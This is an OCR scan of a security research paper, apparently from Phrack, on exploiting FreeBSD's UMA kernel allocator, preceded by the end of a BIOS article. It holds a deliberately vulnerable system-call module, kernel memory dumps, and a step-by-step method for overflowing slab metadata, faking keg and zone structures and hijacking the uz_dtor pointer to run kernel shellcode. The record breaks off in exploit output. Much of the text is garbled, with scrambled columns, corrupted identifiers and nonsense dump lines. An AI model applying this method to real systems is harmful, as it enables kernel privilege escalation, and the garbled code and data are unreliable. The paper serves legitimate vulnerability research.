But meanwhile, we need more people looking, reversing and 
understanding this crucial piece of software. 

It has bugs, it can contain malicious code, and most importantly, 
BIOS can have complete control of your computer. Years ago people 
regained part of that control with the open-source revolution, but 
users won’t have complete control until they know what’s lurking 
behind closed-source firmware. 

If you want to improve or start researching your own BIOS and 
need more resources, an excellent place to start would be 

the WIM’S BIOS High-Tech Forum [WBHTF], where very low-level 
technical discussions take place. 
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|=-------- =[ Exploiting UMA, FreeBSD’s kernel memory allocator ]=-------- =| 


[ By argp <argp@hushmail.com>, ] 
[ karl <karl@signedness.org ] 
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--{ 1 - Introduction 


The latest development version (8.0-CURRENT at the time of this writing) 
of FreeBSD has introduced stack-smashing detection and protection for the 
kernel by utilizing the incorporation of SSP in GCC [1, 2]. This creates 
an increased interest in exploring the FreeBSD kernel heap implementation, 
or zone allocator to be more precise, from a security perspective since it 
currently provides no exploitation mitigation mechanisms. 


This paper presents my findings on exploiting FreeBSD’s kernel memory 
allocator, or UMA - the universal memory allocator [3, 4], on the IA-32 
platform. While a certain amount of knowledge of the FreeBSD kernel’s 
internals and IA-32 assembly would be useful in following the paper, they 
are not strictly required. All presented details and supporting code have 
been tested on FreeBSD 7.0, 7.1, 7.2 and 8.0-CURRENT from 20090511, but 
since 7.2 is the latest stable version all code excerpts have been taken 
from it. 


--[ 2 - UMA: FreeBSD’s kernel memory allocator 


UMA or the universal memory allocator, also referred to as a zone 

allocator in the documentation, is FreeBSD’s kernel memory allocator that 
functions like a traditional slab allocator [5]. The main idea behind 
s 
f 


lab allocators is that they provide an efficient memory management 
ront-end, usually divided into multiple layers, to the low-level pag 
allocations by retaining the state of constant-sized items between uses. 
It is called a slab allocator since it initially allocates large areas, or 
slabs, of memory and then pre-allocates on them items of a particular type 
and size per slab. When the kernel requests through the malloc(9) 
interface items of a certain type, a pre-allocated item that was marked as 
free from the corresponding slab is returned. UMA is also used for 
arbitrary-sized malloc(9) requests in which case the requested size is 
adjusted for alignment to find the suitable slab. The advantages of this 
approach are no fragmentation of the kernel’s memory and increased 
performance since the items are pre-allocated and grouped to slabs 
according to their size. 


The exploitation of slab overflow vulnerabilities has been investigated in 
the past by twiz and sgrakkyu in the context of the Linux and Solaris 
kernels [6]. Specifically, they have identified that slab overflows may 
lead to corruptions of a) adjacent items on a slab, b) page frames that 
are adjacent to the last item of a slab, or c) slab control structures. 

Th xample they give in [6] uses approach a) to exploit Linux kernel slab 
overflows. On FreeBSD I use approach c). 
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Since FreeBSD’s UMA implementation uses the terms ’zone’ and ’slab’ to 
refer to conceptually different things, I will now stop using them 
interchangeably. A full explanation of both is given below, just keep in 
mind for the time being that in the context of the FreeBSD kernel a zone 
and a slab are not the same thing. 


On FreeBSD we can use the vmstat(8) utility to get a report on the 
different types of zones that the kernel has created for its data 
structures, and their characteristics like name, size of the type of item 
allocated on them, number of items currently in use, and number of free 
items per zone, among others: 


[argp@julius ~]$ vmstat -z 


ITEM SIZE LIMIT USED FREE REQUESTS FAILURES 
UMA Kegs: 128, 0, 94, 26, 94, 0 
UMA Zones: 480, 0, 94, 2, 94, 0 
UMA Slabs: 64, 0, 353, 1, 712, 0 
UMA RCntSlabs: 104, 07 69, By 69, 0 
UMA Hash: 128, 0, 6, 24, hy 0 
16 Bucket: 76, 0; Sal 197, 50, ) 
32 Bucket: 140, 0; 20, 8, 41, 0 
64 Bucket: 268, 0, 27, 1, 76, cI alt 
128 Bucket: 524, 0, 18, 3, 975, 30 
VM OBJECT: 124, 0, 830, 69, 12161, 0 
MAP: 140, 0; hy Zig he 0 
KMAP ENTRY: 68, T5512, 24, 200, NEL O.7 0 
MAP ENTRY: 68, 0; Sporoy" 1 hg 24862, 0 
DP fakepg: eae 0, 0, 0, 0, 0 
mt_zone: 1032, 0, 25,5;5 129, 255% 0 
16: 16, 0, 2250, 389, 15191, 0 
32% 3:24; 0, 1163, 80, 10077, 0 
64: 64, 0, 3244, 60, 5149, 0 
128: 128, 0; 1493, 187, 5820, 0 
256: 256, 0, 308, 7, 3591, 0 
52% Ble2 0, 43, 13, 827, 0 
1024: 1024, 0, 47, Bay 1405, 0 
2048: 2048, 0, 314, 6, 491, 0 
4096: 4096, 0, 101, 1:2; 4900, 0 
Files: 76, 0, 5a, 99, 3803, 0 
URNSTILE: 76, 0, 18; 66, 78, 0 
umtx pi: 52, 0, 0} 0, 0, 0 
PROC: 696, 0; 62, 18, 839, 0 
HREAD: 556, 0, 16; L;, 76, 0 
UPCALL: 44, 0, 0, 0, 0, ) 
SLEEPQUEUE: 325 0, 78, 148, 78, 0 
VMSPACE: 232%; 0, 20, 31, 797, 0 
cpuset: 40, 0,, 2y 182, 2; 0 
audit_record: 856, O:; OF 0, 0, 0 
mbuf_packet: 256, 0, 0, 128, 26, 0 
mbuf: 256, 0, ley 141, 778, 0 
mbuf_cluster: 2048, 8768, 128, 6, 141, 0 
Mountpoints: 716, 0, 5 Sy 5% 0 
FFS inode: 128, 0, 429, 21, A515 0 
FFS1 dinode: 128, O:; 0, 0, 0, 0 
FFS2 dinode: 256, 0% 429; 21, 4515 0 
SWAPMETA: 276, 30548, O07 0, O 0 


FreeBSD’s UMA implementation uses a number of different structures to 
manage kernel virtual memory. All of these structures can be found in 
src/sys/vm/uma_int.h. The fundamental one is the zone which is defined as 
a struct of type uma_zone [7]: 


struct uma_zone { 
char *uz_name; /* Text name of the zone */ 
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struct mtx *uz_lock; /* Lock for the zone (keg’s lock) */ 
uma_keg_t uz_keg; /* Our underlying Keg */ 2-1 
LIST_ENTRY (uma_zone) uz_link; \ 

/* List of all zones in keg */ 2-2 
LIST_HEAD(,uma_bucket) uz_full_bucket; /* full buckets */ 2-3 
LIST_HEAD (, uma_bucket) uz_free_bucket; /* Buckets for frees */ [2-4 
uma_ctor UZACEOLF /* Constructor for each allocation */ 
uma_dtor uz_dtor; /* Destructor */ 2-5 
uma_init uz_init; /* Initializer for each item */ 
uma_fini uz_fini; /* Discards memory */ 
u_int64_t uz_allocs; /* Total number of allocations */ 
u_int64_t uz_frees; /* Total number of frees */ 
u_int64_t uz_fails; /* Total number of alloc failures */ 
uint1l6_t uz_fills; /* Outstanding bucket fills */ 
uintl6_t uz_count; /* Highest value ub_ptr can have */ 


/* 
* This HAS to be the last item because we adjust the zone size 
* based on NCPU and then allocate the space for the zones. 

Bad 


struct uma_cache uz_cpu[1]; /* Per cpu caches */ 


}; 


Each uma_zone structure is created to allocate a specific type of kernel 
memory and is itself allocated on a zone called ’UMA Zones’. As we can 
see, uma_zone contains function pointers for allowing the kernel 
programmer to define custom constructors and destructors for each 
allocated item. This is an important detail to keep in mind when we are 
looking for a way to divert the flow of execution after an overflow. 
uma_zone also holds statistical data for the zone, like the total numbers 
of allocations, frees and failures. Most importantly, a zone structure 
also contains two lists of uma_bucket structures, or buckets, which cache 
items that have been allocated/deallocated from the zone’s slabs. These 
buckets are defined as follows [8]: 


struct uma_bucket { 


LIST_ENTRY (uma_bucket)  ub_link; /* Link into the zone */ 
int1l6_t ub_cnt; /* Count of free items. */ 
intl6_t ub_entries; /* Max items. */ 

void *ub_bucket[]; /* actual allocation storage */ 


}; 


In a uma_zone struct the uz_free_bucket list at [2-4] holds buckets to be 
used for deallocations of items, while the uz_full_bucket list at [2-3] 
for allocations. 


[To enhance performance on multiprocessor systems each zone also has an 
array of per-CPU caches that are logically on top of the zone’s buckets. 
These are defined structures of type uma_cache [9]: 


struct uma_cache { 


uma_bucket_t uc_freebucket; /* Bucket we’re freeing to */ 
uma_bucket_t uc_allocbucket; /* Bucket to allocate from */ 
u_int64_t uc_allocs; /* Count of allocations */ 
u_int64_t uc_frees; /* Count of frees */ 


}; 


A keg is another UMA structure used for back-end allocation that describes 
the format of the underlying page(s) on which the items of the 
corresponding zone are stored. Kegs are of type struct uma_keg [10]: 


struct uma_keg { 
LIST_ENTRY (uma_keg) uk_link; /* List of all kegs */ 


struct mtx uk_lock; /* Lock for the keg */ 
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struct uma_hash uk_hash; 
,IST_HEAD (, uma_zone) uk_zones; \ 
/* Keg’s zones */ 2-6 
,IST_HEAD (, uma_slab) uk_part_slab; \ 
/* partially allocated slabs */ [2-7 
LIST_HEAD (, uma_slab) uk_free_slab; ‘\ 
/* empty slab list */ 2-8 
LIST_HEAD (, uma_slab) uk_full_slab; \ 
/* full slabs */ 2-9 
u_int32_t uk_recurse; /* Allocation recursion count */ 
WT NES 2A uk_align; /* Alignment mask */ 
u_int32_t uk_pages; /* Total page count */ 
u_int32_t uk_free; /* Count of items free in slabs */ 
u_int32_t uk_size; /* Requested size of each item */ 
u_int32_t uk_rsize; /* Real size of each item */ 
u_int32_t uk_maxpages; /* Maximum number of pages to alloc */ 
uma_init uk_init; /* Keg’s init routine */ 
uma_fini uk_fini; /* Keg’s fini routine */ 
uma_alloc uk_allocf; /* Allocation function */ 
uma_free uk_freef; /* Free routine */ 
struct vm_object *uk_obj; /* Zone specific object */ 
vm_offset_t uk_kva; /* Base kva for zones with objs */ 
uma_zone_t uk_slabzone; \ 
/* Slab zone backing us, if OFFPAGE */ [2-10] 
u_int16_t uk_pgoff; /* Offset to uma_slab struct */ [2-11] 
u_intl6_t uk_ppera; /* pages per allocation from backend */ 
u_intl6_t uk_ipers; /* Items per slab */ 
u_int32_t uk_flags; /* Internal flags */ 


}; 


While it is possible for a zone to be associated with more than one keg 


for receiving allocations from multiple source pages, 


common occurrence 


association between kegs and zones. 


it is not a very 


(except in some network optimization cases for example) 
and therefore we will focus on the case of having an one-to-one 


When a zone is created by the kernel, 


the corresponding keg is created as well. A zone’s keg holds three lists 
of slabs: 
* uk_full_slab is the list which holds full slabs; that is slabs on 
which all items are marked as being used or allocated [2-9], 


* uk_free_s]l 


ab holds sl] 


used or free 


* the uk_part_slab list holds slabs 
E2—hl% 


free items 


[11]: 


struct uma_slab { 


struct uma_slab_head 


struct { 


u_int8_t 


Each slab is of size UMA_SLAB_ SIZE 
default is set to 4096 bytes. 


[2-8] ’ 


abs on which 


all items ar 


marked as not being 


which contain both allocated and 


which is equal to PAGE_SIZE, 


which by 


} us_freelist[1]; 


}; 


The slab header structure, 
that are necessary for the management of the slab/page 


struct uma_slab_head { 


uma_keg_t 


us_keg; 


us_head; 


uma_Slab_head at 


Slabs are described by uma_slab structures 


/* slab header data */ [2-12] 


us_item; 


/* actual number bigger */ 


[2-12], contains the metadata 


FLA) 


/* Keg we live in */ [2-13] 
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union { 
LIST_ENTRY (uma_slab) 
unsigned long _us_size; 
} us_type; 
SLIST_ENTRY (uma_slab) us_hlink; 
u_int8_t *us_data; 
Inte us_flags; 
Wnts <tc us_freecount; 
u_int8_t us_firstfree; 
}; 
So, to put it all together, 


allocated from the zone’s slabs. 


_—us_link; 
/* Size of al 


which holds the zone’s slabs. 
frame 
management metadata. 


(usually 4096 bytes) and 


structures we have analyzed so far: 


, 


ay 


X 


CPU 0 cache 


juc_freebucket | 
Juc_allocbucket | 


uma_cache | 


|<----|uma_zone| 


i 


ES === >*|uma_bucket | 


| 
| 
Prrrrvrrrvrrvrrveas | 
| 
1 
T 


| | 
| | 
V V 
uz_free_bucket 


uz_full_bucket 


>i 


‘ | aes | 


. ‘|uma_bucket | 


>|uma_keg 
s, 


/* slabs in zone */ 
llocation */ 


/* Link for hash table */ 
/* First item */ 
/* Page flags see uma.h */ 
/* How many are free? */ 

/* First free item index */ 


each zone holds buckets of items that are 

Each zone is also associated with a keg 

Each slab is of the same size as a page 

has a slab header structure which contains 

The following diagram ties together all the UMA data 


| 
V 
uk_part_slab 


‘| 


uma_bucket 


| 
V 
uk_free_slab 


‘| 


*|/uma_slab | 


| 
Vv 
uk_full_slab 


ay | a te 


*/uma_slab | 


uma_Slab 


|uma_slab_head | 


\ 


, 


|struct { 


|void *ub_bucket []; | 


‘N , | 


>/u_int8_t us_item 


|} us_freelist[]; 
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x , | 


Depending on the size of the items a slab 


uma_slab structure may or may not be embedded in the slab itself. 


example, 
'16’) which serve malloc (9) 
alignment purposes the requested siz 
is able to store eight items of 512 bytes 


let’s consider the anonymous zones 
requests of arbitrary sizes by adjusting for 
to the nearest zone. 


has been divided into for, the 
For 
(6409.6. T2048" FP 1LO24 obey 


The ’512’ zone 
in every slab associated with 


it. The uma_slab structure in this case is stored offpage on a UMA zone 


that has been allocated for this purpose. 
associated with the '512’ 
this slab zone (uk_slabzone at [2-10]) 
specifies the offset to the corresponding 
[2-11]). 


On the other hand, the slabs of the 
items (of size 256 bytes each) 
stored onto the slabs themselves after th 


"256" 


The uma_keg structure 


zone actually contains a uma_zone pointer to 
and an unsigned 16-bit integer that 


uma_Slab structure (uk_pgoff at 


anonymous zone store fifteen 


and in this case the uma_slab stuctures are 


memory reserved for items. 


These two slab representations are actually illustrated in a comment in 


the FreeBSD code repository [13]. 


We include the diagram here since it is 


represents a slab 


crucial for the understanding of the slab structure (’i’ 
item): 

Non-offpage slab 

| 

PIZPTELIAP PAPA iP llil lat latsatlallillillil [slab header 
| | | | lesa ee) ssh lel es hee leslie les let | 

| 

Offpage slab 


lab header | | 
|---+ 


3 - A sample vulnerability 


In 


order to 


facility [14]. 


xplor 


will 


the possibility of exploiting UMA related overflows we 
will add a new system call to FreeBSD via the dynamic kernel linker 
The new system call 


(KLD) 


use malloc(9) and introduce an 


overflow on UMA managed memory. 


his samp] 


e vul 


nerabil 


ity is based on the 


[15] 


signedness.org challenge #3 by karl 


(we don’t include the complete 


KLD module here, s Pal 
code): 


#define SLOTS 100 
static char *slots[SLOTS]; 


#define OP_ALI 
#define OP_FREE 


=] 
7] 
i) 


struct argz 

{ 
char *buf; 
u_int len; 
int op; 
u_int slot; 

}; 


static int 


bug (struct thread *td, void 


*arg) 


bug/bug.c in the code archive for the full 


8.txt Wed Apr 26 09:43:46 2017 7 
{ 


struct argz *uap = arg; 


if (uap->slot >= SLOTS) 
{ 
return 1; 


} 


switch (uap->op) 
{ 
case OP_ALLOC: 
if(slots[uap->slot] != NULL) 
{ 
return 2; 


} 


5 


[3=1) slots[uap->slot] = malloc(uap->len & ~Oxff, M_TEMP, M_WAITOK); 
if (slots[uap->slot] == NULL) 
{ 
return 3; 


} 


uprintf("[*] bug: %d: item at %p\n", uap->slot, 
slots[uap->slot]); 


[3-2] copyin(uap->buf, slots[uap->slot] , uap->len); 
break; 


case OP_FREE: 
if (slots[uap->slot] == NULL) 
{ 


return 4; 


} 


[3-3] free (slots[uap->slot], M_TEMP); 
slots[uap->slot] = NULL; 
break; 
default: 


return-5? 


} 


return 0; 


} 


The new system call is named ’bug’. At [3-1] we can see that malloc(9) 
does not request the exact amount of memory specified by the system call 
arguments (and therefore the user), but then in [3-2] the user-specified 
length is used in copyin(9) to copy userland memory to the UMA managed 
kernel space memory. In [3-3] we can see that the new system call also 
provides for us a away to deallocate a previously allocated slab item. 
After compiling and loading the new KLD module we need a userland program 
that uses the new system call ’bug’. Using this we populate the slabs of 
the ’256’ anonymous zone with a number of items filled with ’0x41’s (file 
exhaust.c in the code archive): 


// Initially we load the KLD: 

[root@julius ~/code/bug]# kldload -v ./bug.ko 
bug loaded at 210 

Loaded ./bug.ko, id=4 


// As a normal user we can now use exhaust.c: 
[argp@julius ~/code/bug]$ kldstat | grep bug 


4 1 Oxc263f000 2000 bug.ko 
[argp@julius ~/code/bug]$ vmstat -z | grep 256: 
256: 256, 0, 30; 35; 9823, 


[argp@julius ~/code/bug]$ ./exhaust 20 
[*] bug: 0: item at O0xc25db300 


8.txt 


bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
bu 
argp@ 
256: 


OMNIA ABWNE 


WDAITADHPWNEF Oe ee ee ee 


+ + + + + + + + FF FF FF FF FF FF F F F FX 


As we can s 
fr have b 
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Oxc25db700 
Oxc25dal100 
0xc2580700 
0xc2580500 
Oxc25daa00 
0xc2580200 
0xc2434100 
Oxc25db000 
Oxc25dba00 
0xc2580900 
Oxc25dab00 
Oxc25db200 
Oxc25db400 
Oxc25db500 
Oxc257£e00 
0xc2434000 
Oxc25db100 
item at 0xc2580e00 
item at Oxc25dad00 
~/code/bug]$ vmstat -z | 
256, 


at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 


item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 
item 


grep 256: 


0, 330, 15, 9873, 
ee from the output of vmstat(8), the number of items marked as 


n reduced from 35 to 15 (since we have consumed 20). 


UMA prefers 
in order to 
further exp 


[2-7] ) 
To 


slabs from the partially allocated list (uk_part_slab 
satisfy requests for items, thus reducing fragmentation. 
lore the behavior of UMA, we will write another userland 


program tha 
free items 

to consume/ 
number of n 
consume/all 
items that 

the code ar 


// Again, 
[root@juliu 
bug loaded 
Loaded ./bu 


t parses the output of ’vmstat -z’ and extracts the number of 
on the '256’ zone. Then it will use the new ’bug’ system call 
allocate this number of items. UMA will subsequently create a 
ew slabs and our userland program will continue and 

ocate another fifteen items (fifteen is the maximum number of 
a slab of the '256’ zone can hold; getzfree.c is available in 
chive): 


we load the KLD as root: 


s ~/code/bug]# kldload -v ./bug.ko 
at 210 


g.ko, id=4 


// As a normal user we can now use getzfree.c: 


argp@julius ~/code/bug]$ ./getzfree 
[ fr items on the 256 zone: 41 
---[ consuming 41 items from the 256 zone 
*] bug: O: item at 0xc25e4900 
*] bug: 1: item at 0xc2592300 
*] bug: 2: item at 0xc25e4300 
*] bug: 3: item at 0xc25e4a00 
*] bug: 4: item at 0xc25e3600 
*] bug: 5: item at 0xc25e4400 
*] bug: 6: item at 0xc25e4000 
*] bug: 7: item at 0xc25e4b00 
*] bug: 8: item at Oxc25e4c00 
*] bug: 9: item at 0xc25e3500 
*] bug: 10: item at 0xc25e4e00 
*] bug: 11: item at 0xc25e4100 
*] bug: 12: item at 0xc2593a00 
*] bug: 13: item at 0xc25e3700 
*] bug: 14: item at 0xc25e4200 
*] bug: 15: item at 0xc2592200 
*] bug: 16: item at 0xc2381800 
*] bug: 17: item at 0xc2593d00 
*] bug: 18: item at 0xc2592600 
*] bug: 19: item at 0xc2592500 
*] bug: 20: item at 0xc235d900 
*] bug: 21: item at 0xc2434b00 
*] bug: 22: item at 0xc2592800 
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*] bug: 23: item at 0xc2434800 
*] bug: 24: item at 0xc2592000 
*] bug: 25: item at 0xc2435e00 
*] bug: 26: item at O0xc25e4d00 
*] bug: 27: item at 0xc25e4600 
*] bug: 28: item at O0xc25e3d00 
*] bug: 29: item at O0xc25e3c00 
*] bug: 30: item at 0xc25e4500 
*] bug: 31: item at 0xc25e3900 
*] bug: 32: item at 0xc25e4700 
*] bug: 33: item at O0xc25e3b00 
*] bug: 34: item at 0xc25e3000 
*] bug: 35: item at 0xc25e3200 
*] bug: 36: item at 0xc25e3800 
*] bug: 37: item at 0xc25e3300 
*] bug: 38: item at 0xc25e3100 
*] bug: 39: item at O0xc25e4800 
*] bug: 40: item at O0xc25e3a00 
[ fr items on the 256 zone: 45 
---[ allocating 15 items on the 256 zone... 
*] bug: 41: item at O0xc25e6800 
*] bug: 42: item at 0xc25e6700 
*] bug: 43: item at O0xc25e6600 
*] bug: 44: item at 0xc25e6500 
*] bug: 45: item at 0xc25e6400 
*] bug: 46: item at 0xc25e6300 
*] bug: 47: item at 0xc25e6200 
*] bug: 48: item at 0xc25e6100 
*] bug: 49: item at 0xc25e6000 
*] bug: 50: item at Oxc25e5e00 
*] bug: 51: item at Oxc25e5d00 
*] bug: 52: item at Oxc25e5c00 
*] bug: 53: item at Oxc25e5b00 
*] bug: 54: item at Oxc25e5a00 
*] bug: 55: item at 0xc25e5900 


During the initial allocations the items are placed at seemingly 
unpredictable locations due to the fact that the items are actually 
allocated in free spots on partially full existing slabs. After the 
current number of free items of the ’256’ zone is consumed, we can see 
that the next allocations follow a pattern from higher to lower addresses. 
Another useful observation we can make is that we always get a final item 


of a slab (i.e. at address 0x e00 for the ’256’ zone) somewhere in the 
next fifteen, or generally ITEMS _PER_SLAB, item allocations of newly 
created slabs. Since we know that the slabs of the ’256’ anonymous zone 


have their uma_slab structures stored onto the slabs themselves, we can 
xplore the kernel memory with ddb(4) [16] and try to identify the 
different UMA structures we have presented in the previous section. 


// We start by examining the memory at item #51 (0xc25e5d00). 


db> x/x O0xc25e5d00,100 

Oxc25e5d00: 41414141 41414141 41414141 4141414 
Oxc25e5d10: 41414141 41414141 41414141 4141414 
0xc25e5d20: 41414141 41414141 41414141 4141414 
0xc25e5d30: 41414141 41414141 41414141 4141414 
Oxc25e5d40: 41414141 41414141 41414141 4141414 
0xc25e5d50: 41414141 41414141 41414141 4141414 
Oxc25e5d60: 41414141 41414141 41414141 4141414 
Oxc25e5d70: 41414141 41414141 41414141 4141414 
Oxc25e5d80: 41414141 41414141 41414141 4141414 
Oxc25e5d90: 41414141 41414141 41414141 4141414 
Oxc25e5da0: 41414141 41414141 41414141 4141414 
Oxc25e5db0: 41414141 41414141 41414141 4141414 
Oxc25e5dc0: 41414141 41414141 41414141 4141414 
Oxc25e5dd0: 41414141 41414141 41414141 4141414 
Oxc25e5de0: 41414141 41414141 41414141 4141414 
Oxc25e5df0: 41414141 41414141 41414141 4141414 


8.txt 
// Item #50 


starts here, 
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(Oxc25e5e00) 


// between items on the slab. 


Oxc25e5e00: 
Oxc25e5el10: 
Oxc25e5e20: 
Oxc25e5e30: 
Oxc25e5e40: 
Oxc25e5e50: 
Oxc25e5e60: 
Oxc25e5e70: 
Oxc25e5e80: 
Oxc25e5e90: 
Oxc25e5ea0: 
Oxc25e5eb0: 
Oxc25e5ec0: 
Oxc25e5ed0: 
Oxc25e5ee0: 
Oxc25e5ef0: 
Oxc25e5f00: 
Oxc25e5f10: 
Oxc25e5f20: 
Oxc25e5f30: 
Oxc25e5f£40: 
Oxc25e5f50: 
Oxc25e5f60: 
Oxc25e5f£70: 
Oxc25e5f80: 
Oxc25e5f90: 


1414141 


t t t t t t t t t t t t t t t 
KR BOB BBHB BBB BBW BWW 
t t t t t t t t t t t t t t t 
KR BB BBB BBB BBW BWW 
t t t t t t t t t t t t t t t 
KR BOB BBB BBB DB BB BWW 
t t t t t t t t t t t t t t t 


8203264 


COONOCOOCORBR KR KBR KR KBRKBRBRKBRBR BBB BBW BA 


Fe a ES Si) ea ES ESS a 
KR BB BBB BBB BBB BBW BB 


Ra Ee RS eee eee ee ee et 
KR BB BBB BBB BBB BW WEA 


t t t t t t t t t t t t t t t t 
KR BOB BBB BKBR BR BBB BBW BA 
t t t t t t t t t t t t t t t t 


8203263 


8203264 


COONONTOCCORBR KBR KBR KBRKBRKBRBRKBRBR BBB BBW BWIA 


as we can s ther 


no metadata 


Fe SS eS Si) Ce i Ea CE cei 
KR BB BBB BBB BBB BBW WB 


Rea SS ee ES eS ee tt 
KR BB BHBKBRBRB BR BBB BB BWA 


t t t t t t t t t t t t t t t t 
KR BOB BHBKBRBB BR DB BB BB WIA 
t t t t t t t t t t t t t t t t 


4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
0 
0 
0 
0 
0 
0 
0 
0 
0 
2 


820b080 


t t t t t t t t t t t t t t t t 
KR BOB BAB HBR BBB BBB BBW BB 
t t t t t t t t t t t t t t t t 


KR BB BHBHBR BBB BBB BW BWA 
t t t t t t t t t t t t t t t t 
KR BOB BBB BRB BR BBB BB WIA 


ROCDCODOOOCOOBR KR KBR KR KR KR KBRKRKBRKBRBR BBB BWA 


// At Oxc25e5fa8 the uma_slab_head structure of the uma_zone structure 


// begins with the address of the keg 
// slab belongs to 


Oxc25e5fa0: 
Oxc25e5fb0: 
Oxc25e5fc0: 
Oxc25e5fd0: 
Oxc25e5fe0: 
Oxc25e5ff0: 


// The first item of the O0xc25e6fa8 slab starts 


Oxc25e6000: 


(0xc1474900). 
0 0 
c25e6fac 0 
4030201 8070605 
0 0 
828 0 
0 0 


41414141 


41414141 


// Now let’s 


xamine th 


ntire keg structure of our slab. 


(variable us_keg at 


c1474900 
c25e5000 
cOb0a09 
0 

0 

0 


here. 
41414141 


[2-13]) that the 


c25e4fa8 
£0002 
£0e0d 

0 

0 

0 


41414141 


Walking through 


// the memory dump with the aid of the description of the uma_keg structure 


// [10] we can easily identify the address of the keg’s zone 


// This is variable uk_zones at [2-6]. 


db> x/x 0xcl1474900,20 


O0xc1474900: 
0xc1474910: 
0xc1474920: 
0xc1474930: 
0xc1474940: 
O0xc1474950: 
O0xc1474960: 
0xc1474970: 


// The memory region of the zone that our slab belongs to 


// is shown below. Using uma_zone’s definition from [7] 


c1474880 
1430000 
0 
c25e7f£a8 
3 

100 
c09e35f0 
0 


c1474980 
0 

0 

0 

la 

0 
c09e35b0 
10fa8 


cOb865cc 
4 
0 
c25e6fa8 


mood 


(Oxcl46dle0). 


c0Obd809a 
0 
c146dle0 
0 

100 

0 

0 

10 


(through the keg) 
we can easily 


// identify that at address 0xcl46d200 we have the uz_dtor function 


// pointer 


[2-5], 
// value of the uz_dtor function pointer is NULL 


// anonymous zone. 
db> x/x Oxcl146dle0, 20 


Oxcl46dle0: 
Oxcl46d1f0: 
O0xc146d200: 
O0xc146d210: 
0xc146d220: 


cOb865cc 
c147492c 
0 
0 
0 


c1474908 
0) 

0 

d£t9 
200000 


among other interesting function pointers. 
(0x0) for the 


c1474900 
0) 
0) 
0) 
c146b000 


The default 
"256' 


0 

0 

ESZ 

0 
c146b1a4 
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Oxcl1l46d230: 2d1 0 2c5 0 
Oxcl46d240: 0 0 0) 0) 
Oxcl46d250: 0 0 0 0) 


To summarize this section before we present the actual exploitation 
methodology: 


* We have observed that if we can consume a zone’s free items 

and force the allocation of new items on new slabs, we can get an 
item at the edge of one of the new slabs within the first 

ITEMS _PER_SLAB number of items, 


* for certain zones their slabs’ management metadata, i.e. their 
uma_Sslab structure which contains the uma_slab_head structure, are 
stored on the slabs themselves, 


* with the goal of achieving arbitrary code execution in mind, we have 
examined the uma_slab_head, uma_keg and uma_zone structures in memory 
and identified several function pointers that could be overwritten. 


--[ 4 - Exploitation methodology 


As we have seen in the previous section, the uma_slab_head structure of a 
non-offpage slab is stored on the slab itself at a higher memory address 
than the items of the slab. Taking advantage of an insufficient input 
validation vulnerability on kernel memory managed by a zone with 
non-offpage slabs (like for example the '’256’ zone), we can overflow the 
last item of the slab and overwrite the uma_slab_head structure [12]. 

This opens up a number of different alternatives for diverting the flow of 
the kernel’s execution. In this paper we will only explore the one w 

have found to be easier to achieve that also allows us to leave the system 
in a stable state after exploitation. 


Returning to the sample vulnerability of our new ’bug’ system call, we 
have discovered that the uz_dtor function pointer is NULL for the ’256’ 
anonymous zone. However, if we manage to modify it to point to an 
arbitrary address we can divert the flow of execution to our code during 
the deallocation of the edge item from the underlying slab. When free(9) 
is called on a memory address the corresponding slab is discovered from 
the address passed as an argument [17]: 


slab = vtoslab((vm_offset_t)addr & (~UMA_SLAB MASK)); 


The slab is then used to find the keg’s address to which it belongs, and 
then the keg’s address is used to find the zone (or, to be more precise, 
the first zone in case the keg is associated with multiple zones) which is 
subsequently passed to the uma_zfree_arg() function [18]: 


uma_zfree_arg(LIST_FIRST (&slab->us_keg->uk_zones), addr, slab); 


In uma_zfree_arg() the zone passed as the first argument is used to find 
the corresponding keg [19]: 


keg zone->uz_keg; 


Finally, if the uz_dtor function pointer of the zone is not NULL then it 
is called on the item to be deallocated in order to implement the custom 
destructor that a kernel developer may have defined for the zone [20]: 


if (zone->uz_dtor) 
zone->uz_dtor(item, keg->uk_size, udata); 


This leads to the formulation of our exploitation methodology (although 
our sample vulnerability is for the '256’ zone, we try to make the steps 
generic to apply to all zones with non-offpage slabs): 


1. Using vmstat(8) we query the UMA about the different zones, we identify 
the one we plan to target and parse the number of initial items marked 
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as free on its slabs. 


2. Using a system call, or some other code path that allows us to affect 
kernel space memory from userland, we consume all the free items from 


th 


target zo 


n 


3. Based on our heuristic observations, we then allocate ITEMS PER SLAB 
number of items on the target zone. Although we don’t know exactly 
which allocation will give us an item at the edge of a slab (it differs 
among different kernels), it will be one among the ITEMS_PER_SLAB 
number of allocations. On all these allocations we trigger the 


vu 
wi 
st 


4. W 


lnerability 
ll overflow 
ructure. 


overwrit 


condition, therefore the item allocated last on a slab 
into the memory region of the slab’s uma_slab_head 


the memory address of us_keg [2-13] in uma_slab_head with 


an arbitrary address of our choosing. Since the IA-32 architecture 
does not implement a fully separated memory address space between 


us 
pu 


us 


erland and 
rpose; the 


erland buff 


kernel space, we can use a userland address for this 
kernel will dereference it correctly. There are a number 


of choices for that, but the most convenient one is usually the 


er passed as an argument to the vulnerable system call. 


5. We construct a fake uma_keg structure at that memory address. Our fake 


wi 


po 
ou 


th sane val 
inter [2-5] 


uma_keg structure is consisting of sane values to all its elements, 
however its uk_zones element [2-6] points to another area in our 
userland buffer. There we construct a fake uma_zone structure, again 


ues for its elements, but we point the uz_dtor function 
to another address at our userland buffer where we plac 


r kernel sh 


licod 


6. The next step is to use the system call in order deallocate the last 


IT 
th 
fu 


EMS_PER_SLA 
en to uma_z 
nection poin 


B we have allocated in step 3. This will lead to free(9), 
free_arg() and finally to the execution of the uz_dtor 
ter we have hijacked in step 5. 


As a first attempt at exploitation let’s focus on diverting execution 
through the uz_dtor function pointer to make the instruction pointer 
execute the instructions at address 0x41424344. Our first exploit is file 
exl.c in the code tarball: 


argp@julius ~]$ 
4 1 Oxc25b60 
argp@julius ~]$ 
argp@julius ~]$ 
eet items 
---[ consuming 4 
*] bug: O: item 
*] bug: 1: item 
*] bug: 2: item 
*] bug: 3: item 
[se items 
---[ allocating 
---[ userland (f 
*] bug: 4: item 
*] bug: 5: item 
*] bug: 6: item 
*] bug: 7: item 
*] bug: 8: item 
*] bug: 9: item 
*)bug::- 108 
*] bug: 11: 
